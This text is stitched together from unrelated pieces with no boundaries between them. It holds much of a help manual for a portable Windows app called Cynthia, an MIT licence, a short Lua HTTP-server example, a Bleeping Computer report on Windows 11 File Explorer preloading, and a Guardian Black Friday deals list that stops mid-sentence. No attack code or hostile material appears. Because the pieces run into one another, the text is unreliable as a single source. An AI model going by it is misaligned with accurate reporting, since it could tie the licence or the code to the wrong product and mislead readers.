1. The first method, Font Feathering, is a simple feather designed specifically to outline each text character in realtime. This has the effect of gently softening the often harsh outline of text characters on LCD screens, which by their nature do not blur neighbouring pixels, as the older CRT (Cathode Ray Tubes) did.
The feather is universally applied to both bitmap fonts (older image based fonts) and vectors fonts (newer mathematical fonts). In this way it allows for a quick and direct text feathering technique, that is easily adjusted to suit, without any need for any complicated or tricky multi-step setup configurations and/or processes.
As a bonus, it works on older operating systems - e.g. Windows 95 - which back in the day had no need/support for it, as LCD monitors were not widely used. It also works on fonts that don't have any embedded feather information, or for smaller font sizes that at times can abruptly discontinue feather support.
This method generates an even, edge-based blurring of the outermost pixels of the text characters. A high value - high or ultra - renders a strong/bold feather, and a low value reduces this to a more subtle display.
Any change updates in realtime.
On a high quality computer monitor were all pixels are transmitted and displayed without any color loss, a "Low" value is typically sufficient to render text gently on the screen. But TVs, which tend to heavily compress their video streams for speed loose some color information and therefore may require a higher setting of "Medium" or "High" for similar results.
2. The second method, Font Specific Antialiasing, relies on the font itself to provide all feather based information. This is usually an 8 bit greyscale range of 0-255. The downside is, if the font has no feather support, or the operating system is old, e.g. Windows 95, then no antialiasing will appear. This method can sometimes be hit and miss.
For instance, take the font Arial, it is universally supported, but surprisingly looses feather support at 12 pt or less, leaving only sharp text characters to be rendered on screen.
To adjust the antialiasing strength, select an option from "Dark" (strong) to "Light" (subtle).
By default, options 1 and 2 above are set to "Low/Dark", which provides the best fit for a wide variety of fonts and their behavior over a broad spectrum of old and new operating systems.
⏶
App startup style
The app can be set to start up in various ways: normally, minimised, maximised or in fullscreen mode. To adjust, click "Options > Settings" and set an option under "Start Style".
Normal:
Starts the app as a window, which is the default mode.
Minimised:
Starts the app hidden from view as a button on your taskbar.
Maximised:
Starts the app as a window, maximised to fill all the available work area on your desktop.
Fullscreen:
Starts the app in fullscreen mode, blocking out everything else on your desktop.
Note
:
If the app has the "Multi-Monitor" option selected (next section down named "Display"), then modes "Maximised" and "Fullscreen" will render the app over the combined screen real estate of all monitors.
⏶
Create a link to the app on your Start button and Desktop, and the Automatic Startup option
The app can create, maintain and remove links for you.
There are three link types supported:
1. Start button
2. Desktop
3. Automatic Startup
Click "Options > Settings" to adjust.
1. The first link type, Start button, creates and automatically maintains a link - also known as a shortcut - on your Start Menu called "Cynthia by BlaizEnterprises.com". As this link is created by and maintained by the app, you must unselect the option to remove the link from your Start Menu.
2. The Desktop link operates identically to the above, maintaining a link on your Desktop named "Cynthia by BlaizEnterprises.com". It also must be unselected to remove the link permanently from your Desktop.
Note
:
As long as either options 1 or 2 above is selected, then the corresponding links are maintained and automatically re-created if need be by the app, even if they're manually deleted from outside the app.
By default, neither option is selected. Optionally, you can create your own manual link/shortcut to the app using Windows with any name/label you wish.
3. The last option, Automatic Startup, creates a link to the app in the startup location of your computer, informing Windows to launch the app when your computer boots/starts up. Again, this link is automatically maintained, therefore unselect the option to remove it.
Note
:
If any of the links above are selected and you plan to remove/delete the app from your computer, it is highly recommended you first unselect all the options above (1-3), then remove/delete the app. Otherwise, Windows can get a little weird and put the links back in some cases without any interaction from the app itself, even if the app is no longer present. This behaviour was observed with earlier versions of Windows 10.
⏶
A few important app settings explained
The majority of the app's important system settings can be found in one location - click "Options > Settings".
An option is considered "on/enabled/selected" when lit, and "off/disabled/unselected" when unlit.
Round Corners:
Render all visual controls, windows, and dialogs with round (curved) corners.
Soft Close:
Automatically close an active dialog window when a click/tap strikes outside the window area - e.g. Save, Open, Font, Options dialogs. This can speed up typical workflows by skipping the need to specifically click the OK or Cancel buttons to close the dialog. For instance, click "Options" to display the options dialog, change a few settings and click/tap outside the window to close it and save changes. Also convenient to cancel a dialog displayed by mistake/change of mind, such as a Save dialog.
Safe Area:
Retains app window on screen at all times, and any sub windows or dialogs within the app. Any attempt to drag the app out-of-range triggers an automatic position correction - a passive system that continuously checks the window position and monitor size. Supports both single and multi-monitor modes.
Show Splash:
Displays an informative/artistic splash screen on app startup. Unselect to disable.
Realtime Help:
Scrolls control-centric help across the top of the current window, dialog, or menu. Hover mouse cursor over / tap finger on a control for related help.
Hints:
Hover mouse over / tap finger on a control to display help related information in a popup bubble
Touch:
Comfortably enlarge controls and menus for touch access (finger taps)
Double Clicks:
Some options work best with a double click / tap for confirmation. This option supports the traditional double click mode. For example, navigating a disk drive using a double click / tap to switch between folders.
On Top:
Set the app above all other apps and windows
Economy:
Normal app operation can use a lot of paint cycles and CPU power, especially if it's rendering graphics and effects continuously on the screen. Economy mode throttles back this usage during periods of extended idleness, e.g. when there is no direct app keyboard input, or indirect mouse cursor movement or finger taps. For more specific information refer to the topic "Economy mode".
32bit Graphics:
Not noticeable on today's powerful computers with their 32 bit monitors and video cards, it however can deliver a small performance improvement on older computers running 24 bit graphics
Frame Maximised:
Show the app's frame whilst maximised. The frame is always hidden whilst in fullscreen mode.
Safe Background:
An optional static or animated background scheme can be set, which renders an image beneath the GUI. If this image is too bold / strong the GUI can be hard to view / use. By default this option limits the background strength to a safe maximum level of 100. Unselect this option to permit the full range of background strength (0-255). If the GUI becomes hard to use or unreadable, press the "F2" key at anytime to restore the app's default settings.
Multi-Monitor:
Permit the app to span the full range of attached monitors when maximised or in fullscreen mode. By default the app spans the current monitor only.
Center Title:
Position the name of the app in the center of the app's window header
Toolbar Alignment:
Align the content of all participating toolbars to the left, center, or to the right
Color Contrast:
Color coordinate important system settings and options into color specific input panels for rapid visual identification
Monochromatic Images:
Use high-contrast, color-adaptive, monochromatic tool images on the app's GUI
Highlight Above:
Retain highlight areas and other important GUI zones whilst a background scheme is in use
Brightness:
Adjust the brightness of the entire app, from 60 being the darkest right up to 130 being the brightest. Any change takes affect immediately. The default brightness is 100.
Unfocused Opacity:
Renders the app translucent upon loosing focus - e.g. when another app is in use. Available range is 30 almost invisible, through to 255 fully visible. Default value is 255. This feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.
Speed:
The speed by which to transition the app from a focused state to a non-focused state or vice-versa. Speed range is 1-10, where 1 is the slowest and 10 the fastest.
Focused Opacity:
Renders the app translucent upon gaining focus - e.g. when the user interacts with it. Available range is 50 almost invisible, through to 255 fully visible. Default value is 255. As above, this feature requires support of a modern operating system and is therefore not supported by Windows 95/98 etc.
Cursor:
Change the default cursor to one of the built-in cursors, each of which scale from small to large, according to the current size set by the operating system. A range of static colors are available: Red, Orange, Pink, Yellow, Purple, Aqua, Blue, Green, Grey, Black, White, along with Default and Custom.
In addition, two dynamically colored cursors are included: "Adaptive - Hover" and "Adaptive - Title". These special cursors acquire their color from the current color scheme. Any change to the color scheme is reflected in the color of the cursor.
The custom cursor option supports both static cursors ".cur" and animated cursor ".ani" file formats. To use, select the "Custom" option. The cursor will update if previously customised. To change the cursor, click the option again and select a cursor from file using the Open dialog.
Frame Sparkle:
Applies a random texture to the app's frame. Select a value from 0 (off) to 20 (bold).
Frame Size:
Adjust the app's frame size (width in pixels) from 0 (none) to 72 (wide). The default frame size is typically 7.
Scrollbar Size:
Set the width and/or height of the app's scrollbars. A value of 5 (thin/short) to 72 (wide/tall) is supported.
Wine Compatibility:
Wine is basically a large computer instruction conversion app, which allows an app designed for Microsoft Windows to execute its instructions "run" on another operating system, such as a Mac or Linux. Because Wine does not emulate / bridge any logic gaps and only translates an app's instructions, the underlying computer hardware must match that used by Microsoft Windows - namely Intel and AMD64.
A notable exception to this requirement is the modern-day Mac, e.g. Mac Mini, which runs an Intel emulator under the hood. This allows a Microsoft Windows app to run by the following sequence: App to Wine to Intel emulator to Apple hardware. Incredibly, this appears to be a very effective and rather efficient strategy, especially for our lightweight apps.
Although Wine's functionality is both wide and impressive, there is some functionality that falls short of Windows. The Wine Compatibility option compensates where possible for important shortcomings, such as volume handling, and allows the app to maintain functionality.
The default option is automatic and detects the presence of Wine based on the existence of drive "Z:\". For more information on Wine refer to their website
www.winehq.org
.
Restore Defaults:
Easily reset the app's system settings, such as color, font size, zoom level etc to their defaults. Click the "Restore Defaults..." button at the bottom-right of the Options window or press the "F2" key at any time in the app to display the "Restore Defaults" confirmation prompt. Confirm your intention to reset and then click the "Restore Defaults" button. The app will reset to default values.
An app typically has settings in addition to these which are not restored / reset. Instead, they should be adjusted via the app itself as required.
⏶
On Top - Position app above other apps and windows
Click the app menu button
(top right) and tick "On Top" option. Alternatively, click "Options > Settings" and select "Display > On Top" option.
⏶
Don't show the splash screen on app start
By default the splash screen is displayed with a momentarily pause on startup. This can be switched off by going to "Options > Settings" and deselecting the "Display > Show Splash" option.
⏶
Where is my app? / Show the app folder
Because this app is portable, you might not remember / know where it is located on your hard disk or usb pen stick. To access its folder, click the app menu button
(top right) and select "
Show App Folder". An explorer window will display with the app's binary (*.exe) and storage folder listed alongside.
⏶
Economy mode
Running an app at full speed when it's not being used can be a bit wasteful, and may prematurely drain the batteries on your laptop or tablet. Select this option to automatically throttle back battery / power consumption and CPU / graphic loads after a short idle period of 10 minutes. At which point the app will reduce its paint cycles down to 2 fps at a maximum. And a further reduction at 30 minutes to 1 fps.
Internal processing loads will typically be reduced also, lowering the demand on your CPU and batteries further.
A single stroke of the keyboard directed at the app, or a global mouse click, or tap of the finger will instantly disengage the current economy state and return the app back to full operation.
To enable, click "Options > Settings" and select "Display > Economy" option.
⏶
Some technical limitations of this app
The Gossamer Code Foundation - our 4th generation codebase - which powers this app has been engineered with care and patience to a high level of quality and reliability.
As our code is rather unique and almost entirely custom built, there are some technical limitations which make our apps incompatible with some extended features of modern operating systems.
These limitations mainly concern the use of UTF-8 and UTF-16 encoding of text, and more specifically filenames. At this stage the app works with the legacy Windows-1252 character encoding for both text processing and filenames. The app is therefore unable to handle foreign language text, or load and save files with special, foreign, or emoji characters in their filenames. All text and filenames are restricted to english ASCII characters in the Windows-1252 encoding standard.
In addition, some options and minor operations may not work as expected, or at all on operating systems other than Microsoft Windows. Though an enormous amount of time and effort has gone into harmonising the look and feel, behaviour and reliability of the app across multiple flavours of Microsoft Windows, Linux, and Mac operating systems, it is not always possible to catch every failure point, or in some rare cases make it work properly, though we always endeavor to do our best.
A side note, our codebase is still running well as 32 bit code in 2025. Yes, 32 bit! Some might see this as a limitation, but we see it as a flexible, inexpensive, and widely adopted execution pathway with support for many platforms and reuse / life extension of older equipment.
⏶
What makes a portable app special?
A portable app is a big leap forward for apps in general. A standard or traditionally engineered app requires a lot of support in the form of libraries, data files, images, scripts, etc and the list goes on. You get the picture. Some portable apps out there still include this bundle of bits, they merely offload it into a local folder. A dump of goodies of sorts.
We tend to see a portable app in quite a different light. Our vision of a portable app is designed tight, clean, free of bloat, and all data where possible is included directly within, structured right into the fabric of the app itself, and designed from the bare-metal up if required.
Though the most important difference between a traditional app and a portable app is that a portable app will not install on your computer. This is extremely important as the installation process is often messy, and can clutter up your computer by dumping a lot of stuff all over the Windows file structure and registry, and over time may slow down and decrease the overall performance of your computer.
A portable app will not do this, which keeps your computer clean and running smooth and fast as it should. Unfortunately most software is not designed with portable in mind. They're more akin to a large leaky box of bits than tight engineering. And because a portable app is not installed on your computer, it runs outside the normal scope of the operating system, and is not locked down or tied to it. And thus can be moved about, from disk to disk, or computer to computer.
Typically a portable app will reside on a USB pen stick, removable media, or in a special folder on a portable hard disk. This makes it easy to take from one computer to the next, and use over and over. An immensely valuable freedom, and something an installed app can only dream of.
But a serious technical hurdle must be overcome for a truly portable app to be free. And that is the humble setting. Yes, a portable app must be able to handle it's settings on it's own. It must be able to read them from disk, filter them, check and correct them where required, and write them back to disk. All without the help of the Windows' registry or other operating system dependent structures.
An installed app typically can't or won't do this. Instead, it relies on Windows and the registry to manage it's settings and other important data sets for it. It therefore takes a higher degree of technical competence to escape this "tied to the operating system" situation.
Here is our current standard for a portable app:
Require no installation or setup
Require no additional DLL libraries to run and perform it's core function
Make no alteration to the host operating system, or its settings, files, libraries or core functions, or the Windows registry, unless it forms a part or a whole of the app's core function, and then, only when initiated by the user
Be able to run "out of the box"
Require no compiling, conversion, installation or setup of support structures in order to execute, except for when such an environment constitutes an execution enabling environment, such as a command translation service like Wine
Be free of zipped or otherwise externally bundled blob structures containing folders, files and bits
Operate on less powerful hardware to facilitate operation on a broad spectrum of computers
Less demanding API landscape to facilitate execution on a broad range of operating systems and software translation environments
Require no special software libraries be present in order to run, such as .NET or JAVA, unless typically pre-installed on the target operating system or execution environment
Not require an internet connection to run, unless the connection is required to fulfill the app's core function, such as a web server
Require no downloads, addons, or registration in order to run
Provide help and documentation offline via a built-in viewer, or by limited external means, such as Notepad
Be self-contained with all necessary files, data sets, and samples stored within it's internal structure, such that access be provided preferably through direct enabling mechanisms
Store, hold and manage external app settings and user data in a local sub-folder, and that sub-folder be easily identifiable as belonging to the app
Provide a mostly consistent appearance and experience to the user across the widest possible range of operating systems and execution environments
Value backwards compatibility, and be able to actively make use of that older hardware and software
Possess a compact, bloat-free footprint
⏶
How to remove the app and what you should do first
Make sure any app related data that is precious to you is backed up before you delete.
As a portable app does not install itself on your computer there will be no automatic uninstall option listed in Windows. The app must be removed manually. But this is not difficult.
First, ensure the options below are unselected before proceeding. Click "Options > Settings" and deselect:
1. Start button link
2. Desktop link
3. Automatic Startup link
If these links are not removed they may linger due to the oddities of some versions of Windows and it's often complex nature and protocols.
If this app is administered by a 3rd party system then that system should be used now to remove this app. If not, then click the app menu button "
" (top right) and select "
Show App Folder". An explorer window will display with the app's executable (*.exe) and storage folder listed.
Make sure any data precious to you has been backed up or moved out of the app's storage folder before proceeding. When you're ready, close the app and right click on it's EXE "<app name>.exe" and select the Delete option. If a prompt appears, confirm your intention to delete. Repeat for the storage folder.
The app is now removed from your computer, USB pen stick, or hard disk.
⏶
Help my app doesn't look right what should I do?
If for some reason your app doesn't appear right, or you think you've turned on or off some important system setting but you're not sure which one or where, not too worry, you can restore the app's default settings in two easy steps.
Step 1:
From anywhere in the app press the "F2" key to display the "Restore Defaults" confirmation window.
Step 2:
When you're sure you're ready to proceed, click the "Restore Defaults" button. The app will reset, restoring all key system settings to their safe defaults, this includes color, font size, zoom level etc.
If you don't have a keyboard, or the "F2" key is not available / difficult to access, you can click the "Options" link from the top toolbar to display the options window, then click the "Restore Defaults..." button (bottom right of window), and lastly confirm by pressing the "Restore Defaults" button. The app will reset / restore defaults.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
-- Create a new server
local server = require("http").server.new()
-- Register a route
server:get("/", function()
return "hello from default Astra instance!"
end)
-- You can also use the local variables within routes
local counter = 0
server:get("/count", function(request, response)
-- consume the request body
print(request:body():text())
-- set header code (Optional)
response:set_status_code(300)
-- set headers (Optional)
response:set_header("header-key", "header-value")
counter = counter + 1
-- and also can return JSON
return { counter = counter }
end)
-- Configure the server
server.port = 3000
-- Run the server
server:run()
Microsoft tests File Explorer preloading for faster performance
Bleeping Computer
www.bleepingcomputer.com
2025-11-24 13:08:08
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times on Windows 11 systems. [...]...
Microsoft is testing a new optional feature that preloads File Explorer in the background to improve launch times and performance on Windows 11 systems.
According to Microsoft, the app will load automatically once the feature is toggled on without visible changes to users, who should only notice faster File Explorer launches when accessing files and folders.
However, this is an optional feature, and those who prefer to disable preloading can uncheck "Enable window preloading for faster launch times" in File Explorer's Folder Options under the View tab.
"We're exploring preloading File Explorer in the background to help improve File Explorer launch performance," the
Windows Insider Program Team said
.
"Looking forward to your feedback! If you do encounter any issues, please file them in the Feedback Hub under Files Folders and Online Storage > File Explorer Performance, or Files Folders and Online Storage > File Explorer."
These File Explorer speed and performance improvements follow the May 2025 rollout of
Startup Boost
, a similar optional feature for Office applications that launches a Windows scheduled task automatically in the background during system logon to help Office apps load faster.
The feature preloads apps in a paused state until the app enhancements, keeping them paused until launched or removed from memory to reclaim resources.
Context menu updates
Microsoft is also updating the File Explorer context menu to reduce clutter while maintaining easy access to less frequently used actions by reorganizing menu items into groups of similar tasks.
File Explorer context menu (Microsoft)
For instance, actions such as 'Compress to ZIP file,' 'Copy as Path,' 'Set as Desktop Background,' and image rotation options have been moved to a new "Manage file" flyout menu.
Additionally, cloud provider options such as 'Always Keep on this Device' and 'Free Up Space' now appear within their respective cloud provider flyouts, alongside the Send to My Phone option. The Open Folder Location command has also been repositioned next to 'Open' and 'Open with' for better grouping.
Microsoft also noted that the 'Manage file' label may change in future updates based on user feedback submitted through the Feedback Hub under Desktop Environment > Right-Click Context Menu.
These features are now rolling out to Windows Insiders in the Dev and Beta channels running Windows 11 25H2 who have installed the 26220.7271 (KB5070307) preview build.
As MCP (Model Context Protocol) becomes the standard for connecting LLMs to tools and data, security teams are moving fast to keep these new services safe.
This free cheat sheet outlines 7 best practices you can start using today.
The best Black Friday deals on the products we love, from sunrise alarm clocks to dehumidifiers
Guardian
www.theguardian.com
2025-11-24 12:56:27
We’ve cut through the noise to find genuinely good early Black Friday 2025 discounts on Filter-recommended products across home, tech, beauty and toys • Big savings – or big regrets? How to shop smart this Black Friday• The best Black Friday beauty deals Like Christmas Day, Black Friday has long sin...
L
ike Christmas Day, Black Friday has long since ceased to be a mere “day”. Yuletide now seems to start roughly when Strictly does, and Black Friday kicked off around Halloween, judging by the landfill of exclamation-marked emails weighing down my inbox.
Black Friday is a devil worth dancing with if you want to save money on products you’ve had your eye on – and it can pay to start dancing now. Some of the Filter’s favourite items are already floating around at prices clearly designed to make them sell out fast. Other deals won’t land until the big day itself on 28 November, or even until the daftly named Cyber Monday (1 December).
As ever, we’d encourage you not to buy anything unless you really need it and have the budget to do so – read
our advice on how to shop smartly
.
We’ll keep this page updated over the next few days with more genuine Black Friday bargains on the Filter’s favourites, from Anker battery packs to KidiZoom cameras via the espresso machine you loved more than any other product this year.
How we selected these deals (and excluded others)
The key to
shopping smart
on Black Friday, Cyber Monday or any discount event is to know what you want – and we’re here to help you target the good stuff. We’ve tested thousands of products at the Filter in 2025 and warmly recommended hundreds of them, including many that have genuinely good Black Friday discounts.
Instead of listing price cuts on all the products we’ve featured, we’ve focused on the things you’ve liked the most this year, and looked for deals that undercut their long-term average prices by a significant amount. Ideally, their Black Friday price will be their lowest of the year.
We don’t take retailers at their word on discount size, either. Amazon may say it’s “70%” off the RRP, but we study the price history of every item using independent tools such as
the Camelizer
to find out how generous a discount really is. If an item’s price has been all over the place in 2025, we’ll give the average price below instead of a “was …” price, so you can judge how good a deal it is.
Q&A
How is the Filter covering Black Friday?
Show
At the Filter, we believe in buying sustainably, and the excessive consumerism encouraged by Black Friday doesn’t sit easily with us. However, we also believe in shopping smarter, and there’s no denying that it’s often the best time of year to buy big-ticket items that you genuinely need and have planned to buy in advance, or stock up on regular buys such as skincare and cleaning products.
Retailers often push offers that are not as good as they seem, with the intention of clearing out old stock, so we only recommend genuine deals. We assess the price history of every product where it’s available, and we won’t feature anything unless it is genuinely lower than its average price – and we will always specify this in our articles.
We only recommend deals on products that we’ve tested or have been recommended by product experts. What we choose to feature is based on the best products at the best prices chosen by our editorially independent team, free of commercial influence.
The best early Black Friday deals on the Filter’s favourite products
The Filter team recommended this pattern-building game as an “addictive”
Father’s Day gift
“guaranteed to be a hit”, but it’s far too good to leave to just the dads. It’s mercifully quick to learn and suitable for tweens and up, so you and your Christmas visitors can have a bout underway faster than you can say “read the instructions”. This is the first time its price has dropped much below £30 since 2023.
Race to find the matching images in this popular observation game – one of our top tips for
keeping kids entertained on long train journeys
. You can mix things up with games-within-games such as “hot potato” and “catch them all”, and it’s versatile enough to suit any number of players from two to eight. This deal isn’t quite the 50% off that Amazon claims (its average price on the site is under £10), but this is its lowest price of 2025.
EA’s FC 26 was released to great fanfare in September, and it’s proved to be one of Amazon’s best Black Friday sellers so far. As Ben Wilson explains in his four-star
review
, this versatile game is a sim offline and a whole other beast online, where it’s purely an esport with shots and goals prioritised over defending. Unusually, Amazon is beaten to the lowest price on this one – by the PlayStation store, no less.
Block out the world and drift off to whatever music, podcast or white noise you choose with this comfy silk sleep mask that incorporates flat Bluetooth speakers for pairing with your phone. It impressed our writer Jane Hoskyn in her mission to find
sleep aids
that actually work, but she found it a little pricey – so this discount is very welcome, and makes the Snoozeband an even better
Christmas gift
idea.
Running watch with Spotify
Garmin Forerunner 165 Music smartwatch, £208.05 (was £289)
One of our favourite
fitness tech
gadgets, Garmin’s GPS smartwatch can’t run a
marathon
for you, but it sure can help ease the pain with its pace-tracking tools, offline Spotify support and 19-hour battery life. Amazon outdoes its rivals with this early deal on the aqua green edition of the watch, now at its lowest price ever.
Professional DJ headphones
AiAiAi Audio TMA-2 DJ headphones, £124.94 (was £159)
Many headphones claim to be pro or DJ-level, but this modular set is a favourite with
actual DJs
. DJ and producer
Sophie Lloyd
told the Filter’s Kate Hutchinson that she loves the sound quality, size and durability of these phones, adding that their modular design means “you can buy a new lead or earpieces separately, which is essential when you’re using them all the time”. This Black deal takes them to their lowest price of 2025.
This fab portable speaker boasts 12-hour battery life, durability and a range of swish colours, making it a must-have for
university life
and beyond. It’s a superb piece of kit for the price, with excellent sound quality, nine-metre Bluetooth connectivity and smart TV support.
The best home deals
Heated fleece throw
Silentnight luxury heated throw, from £36 (was £45)
One of Amazon’s best sellers this Black Friday but 25p cheaper at Boots, Silentnight’s toasty fleece blanket was one of the lighter and thinner options in our
best heated throws
roundup. That makes this 120 x 160cm throw ideal for wrapping around yourself (and no-one else) on the sofa as the evenings grow ever colder.
Owlet’s feature-packed smartphone-compatible baby monitor was one of the favourite
baby products
when we spoke to parents last year. If you’d rather not give your £199 to Amazon, John Lewis is only 99p more.
The best combination steam cleaner
Vax Steam Fresh Total Home mop, from £84 (was £160)
Emerging from Stuart Andrews’
best steam cleaners
test as the “best combination cleaner”, Vax’s versatile mop proved easy and effective to use on multiple surfaces and tight corners. The handheld bit detaches easily from the body then slots back in when needed, and you get an array of brushes, scrapers, pads and nozzles. This dirt-blitzing package has dropped more than 40% at Currys and Amazon.
Smart wake-up and reading light
Philips SmartSleep sleep and wake-up light, £139.99 (avg £179.61)
When testing products for his guide to the
best sunrise alarm clocks
, our writer Pete Wise was struck by how well this one worked as a reading light. “Even when a bright setting is selected, the light seems relatively mellow and restful,” wrote Pete, who also liked the range of alarm sounds and audio input option. He found it a little too expensive, however – and it’s still north of £100, but somewhat less so.
A heated airer dries your clothes fast enough to avoid the dreaded stink of slow-dried laundry, and without the cost or noise of a tumble dryer. Lakeland’s three-tier heated airer – the top performer in our
heated airers
test – has proved enduringly popular with the Filter’s readers, and is now at its lowest price ever. Lakeland has also dropped the price of the
airer with cover
to £195.98 for Black Friday.
The best hybrid mattress
Photograph: Jane Hoskyn/The Guardian
Otty Original Hybrid double, £627.75 with code THEFILTER7 (was £647.99)
The most comfortable and supportive foam-and-springs hybrid of all the
mattresses
we’ve tested, the Otty already came at an impressive price of £647.99 for a double, but the Filter’s exclusive code gives you a small but perfectly welcome additional 7% off for Black Friday. For a deeper dive into this cosy mattress, read our
Otty Original Hybrid review
(spoiler: it gets five stars). Otty is now bundling two of
our favourite pillow
(usually £69.99 each) in with each mattress order, too.
Mattress “discounts” may seem to be a 24/7/365 thing, but UK watchdogs have given companies short shrift over money-off claims that aren’t all they seem. We’ve certainly noticed Simba playing by the rules lately, and its current 30%-off sale is the first we’ve seen in months. The excellent
Simba Hybrid Pro
, another of our
best mattresses
, is now hundreds of pounds cheaper in all sizes, from single (now £599.25) to super king (now £1,091.22).
Wool mattress topper
Woolroom Deluxe wool topper (double), from £
148.74 (was £174.99)
The sustainably sourced wool in Woolroom’s bedding is a hypoallergenic temperature regulator, helping to keep you warm in winter and cool on hotter nights. The company’s deluxe
mattress topper
adds a touch of softness to a too-hard mattress, and is one of the easiest toppers we tested to move and store. Woolroom’s 35% isn’t quite as big a discount as Amazon’s, but it applies to everything on its site, including duvets, mattresses and linens.
Powerful pressure washer
Bosch UniversalAquatak 135 high pressure washer, £135 (was £209)
Blitz the gunk from your patio, decking, gutters and any flat surface you find yourself unable to resist pointing the nozzle at. Our writer Andy Shaw found the UniversalAquatak to be the most powerful of all the
pressure washers
he tested, and he thought its price was reasonable too. It’s now even cheaper for Black Friday, although not quite its lowest price of 2025 – it was briefly (very briefly) under £120 for Prime Day.
A vacuum cleaner that empties itself? Yes please, said our writer Andy Shaw in his roundup of the
best cordless vacuum cleaners
– and you agreed, making Shark’s ingenious and powerful cordless cleaner one of your favourite products of the year. Vacuums that look after themselves don’t come cheap, and it’s great to see this one heavily discounted at Shark’s own website as well as at Amazon.
You wait a lifetime for a self-emptying vacuum cleaner, then Black Friday brings you two at once. The Eufy X10 was named “best overall” by Stuart Andrews in his guide to the
best robot vacuums
, and it’s already one of the fastest-selling items in Amazon’s Black Friday sale. Its price cut isn’t quite the 38% Amazon suggests, because it cost £579 throughout 2025, but this is still a legitimately good deal.
Damp-destroying dehumidifier
ProBreeze dehumidifier, from £151.99 (was £189.99)
This “workhorse”, which “extracted moisture powerfully” in our
best dehumidifiers
test, has tumbled to its lowest price of the year (except for a few days in May, because no one buys dehumidifiers in May). If the recent cold snap gave you the condensation blues, here’s your chance to snap up the ProBreeze for a chunk below its average Amazon price of just over £180.
Beurer’s “soft and sumptuous” fleece blanket was crowned “best throw overall” in our guide to the
best electric blankets
thanks to its ability to get toasty fast without using much energy. A fiver off is not a massive discount, but this is its cheapest recent price on Amazon, where it normally costs £84.99 – and other retailers still want over £100 for it. We’ll bring you any non-Amazon deals that emerge in the coming days.
Sort the cold-callers from the welcome visitors when they’re still metres away from your front door, with this outstanding battery-powered doorbell that crashes to its lowest price since Black Friday 2023. Andy Shaw named it the
best video doorbell
overall, but lamented that you also have to fork out for a
Nest Aware subscription
at £80 a year to save recordings.
Budget electric blanket
Slumberdown Sleepy Nights electric blanket, king size, from £30.59
(was £45.99)
This Slumberdown Sleepy Nights performed admirably in Emily Peck’s test of
the best electric blankets
, heating quickly to a temperature that was comfortable to keep our reviewer warm through the night. It also has elasticated fitted straps to make fitment easy, and comes in a variety of sizes to suit your bed size. It’s the king-size one that’s been discounted.
Lots of video doorbells and home surveillance systems come with a recurring subscription to access some of their features, which you may wish to avoid. If so, then the Eufy Video Doorbell E340 was Andy Shaw’s pick in his testing of the
best video doorbells
out there. He liked the E340 precisely because of its dual camera setup to make keeping an eye on parcels a breeze, plus the onboard storage to stick it to cloud storage. Reliability of movement detection needed some work, though. At £74.99 from Amazon, it’s also at its lowest price ever this Black Friday from the big online retailer.
Having cornered the market in air fryers, Ninja now has its eye on all your kitchen needs, starting with your morning coffee – however you take it, from cold brew to latte. The “sublime espresso”, “ingenious milk frother” and Barista Assist feature of the Ninja Luxe impressed our writer Sasha Muller enough to win it a place in the
best espresso machines
and
best coffee machines
, where Sasha noted that “you get a lot for your money” even at full price.
The best budget kettle in Rachel’s
best kettles
test, the handsome Kenwood looks more expensive than even its RRP suggests, and impresses with a wide pouring spout, single-cup boil and two water windows. Currys has the best Black Friday deal so far, with the white edition dropping to a bargain £27. At John Lewis it’s £28 for white or eggshell blue, while the Amazon deal is for midnight black.
This curious-looking device is a widget on steroids. It brings the nitro beer effect to your Guinness at home, enabling you to pour the black stuff in two-part draught style, just like any good bartender. It’s a brilliant
Christmas gift
idea, now with a third wiped off its price … so, sincere apologies if you bought it last week when we first recommended it. Note you’ll need to buy special
Nitrosurge Guinness
too, but that’s also in the Black Friday sale, at £16.50 for a pack of 10 one-pint cans.
The promise of “ludicrously tasty” espresso and “perfect microfoam for silky cappuccinos and flat whites” proved so irresistible that this was one of the Filter recommendations you loved most in 2025. Our writer Sasha Muller was already wowed by its affordability in his
espresso machines
test, and it’s rarely discounted at all, so we’re not too sad to see it drop just a few pounds for Black Friday.
Capsule coffee machine
Philips L’or Barista Sublime, from £45 (avg £69.40)
The price of this sleek machine has bounced between £105 and about £60 since 2023, only ever dipping to £45 for Black Friday each year. Its compatibility, compactness and coffee impressed the Filter’s cuppa connoisseur, Sasha Muller, enough to be named “best capsule machine” in his bid to find the
best coffee machines
.
If you’re still holding out on buying an air fryer, here’s a rare chance to grab a big-name, big-capacity Ninja without the big price tag. Not quite so big, anyway. Rachel Ogden named the Double Stack XL “best compact air fryer” in her guide to the
best air fryers
, but with its 9.5lL capacity and four cooking levels, this thing can cook a
lot
. Still not cheap, but far below its average price of £229.
You can spend about £500 on a premium blender, but this superb model from Braun costs below £200 even at full price – something our
best blenders
tester, Rachel Ogden, could hardly believe when she named it “best overall”. Hold on to your smoothie, Rachel, because it’s now less than £150, and not just at Amazon.
Tefal is known mostly for its ActiFry tech, so when Rachel Ogden crowned the Tefal Easy Fry Dual XXL as the
best air fryer
, it made sense. She found it to be a sublime all-rounder in her testing, handling both chips and frozen food very well. With an 11-litre capacity, it’s also Tefal’s largest dual zone air fryer, making it handy for cooking a lot of food for larger families when you need to.
Crowned overall winner in Rachel Ogden’s missions to find the
best kettles
